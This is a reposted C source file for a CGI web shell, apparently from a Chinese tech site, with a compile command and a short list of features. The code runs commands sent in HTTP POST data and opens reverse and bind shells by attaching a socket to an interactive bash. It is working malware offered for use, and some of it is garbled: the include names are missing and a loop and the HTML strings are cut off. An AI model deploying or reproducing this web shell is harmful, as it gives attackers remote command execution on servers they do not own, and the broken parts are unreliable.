时间:2021-07-01 10:21:17 帮助过:26人阅读
#include#include #include #include #include #include #include #include #include #include #include struct get_data { char key[100]; char value[100]; }; void exec_cmd(void){ printf("Content-type:text/html\n\n"); FILE *command; int size = atoi(getenv("CONTENT_LENGTH")); if(size > 1500) { printf("Error> Post Data is very big"); exit(0); } char *buffer = malloc(size+1); fread(buffer,1,size,stdin); command = popen(buffer,"r"); char caracter; while((caracter = fgetc(command))){ if(caracter == EOF) break; printf("%c",caracter); } pclose(command); free(buffer); exit(0); } int error(char *err){ perror(err); exit(EXIT_FAILURE); } void parser_get(void){ printf("Content-type:text/html\n\n"); struct get_data *s; char *GET = (char *)getenv("QUERY_STRING"); int i,number_of_get = 0,size_get = strlen(GET); if(strlen(GET) > 100) exit(0); s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data)); int element = 0; int positionA = 0; int positionB = 0; int id = 0; for(i=0;i 65535){ printf("Something is wrong ... !!!"); free(type_x); free(host_x); exit(0); } if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){ printf("You must specify a target host ..."); free(type_x); free(host_x); exit(0); } if(strcmp(type_x,"reverse") == 0){ struct sockaddr_in addr; int msocket; msocket = socket(AF_INET,SOCK_STREAM,0); if(msocket < 0){ printf("Fail to create socket"); free(host_x); free(type_x); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(port_x); addr.sin_addr.s_addr = inet_addr(host_x); memset(&addr.sin_zero,0,sizeof(addr.sin_zero)); if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){ printf("Fail to connect\n"); free(host_x); free(type_x); exit(0); } printf("Connect with sucess !!!\n"); if(fork() == 0){ close(0); close(1); close(2); dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2); execl("/bin/bash","bash","-i", (char *)0); close(msocket); exit(0); } free(host_x); free(type_x); exit(0); } else if (strcmp(type_x,"bind")==0) { int my_socket, cli_socket; struct sockaddr_in server_addr,cli_addr; if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){ printf("Fail to create socket"); exit(1); } server_addr.sin_family = AF_INET; server_addr.sin_port = htons(port_x); server_addr.sin_addr.s_addr = INADDR_ANY; bzero(&(server_addr.sin_zero), 8); int optval = 1; setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval); if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){ printf("Fail to bind"); free(host_x); free(type_x); exit(1); } if (listen(my_socket, 1) < 0){ printf("Fail to listen"); free(host_x); free(type_x); exit(1); } else { printf("Listen on port %d\n",port_x); } if(fork() == 0){ socklen_t tamanho = sizeof(struct sockaddr_in); if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){ exit(0); } close(0); close(1); close(2); dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2); execl("/bin/bash","bash","-i",(char *)0); close(cli_socket); } } free(host_x); free(type_x); exit(0); } void load_css_js(void){ printf("\n\ \n\ "); } int main(void){ if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd(); if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get(); printf("Content-type:text/html\n\n"); printf("\n"); printf("\t\n\t\n"); printf("\t\t C CGI SHELL =D \n"); load_css_js(); printf("\n\t\n"); printf("\t\n"); printf(" \n\ \n\C - CGI SHELL
C0d3r: webshell | REVERSE/BIND\n\ \n\ \n\
\n\ \n\ \n\ \n\Reverse Connection: Stop\n\ \n\ \n\ \n\ \n\
\n\Bind Connection: Stop\n\ \n\ \n\ \n\ \n\ \n\ \n\ \n\ "); return 0; }
编译:
gcc shell.c -o shell.cgi
功能:
1.反弹获得shell(target作为客户端)
2.监听获得shell(target作为服务端)
3.命令行执行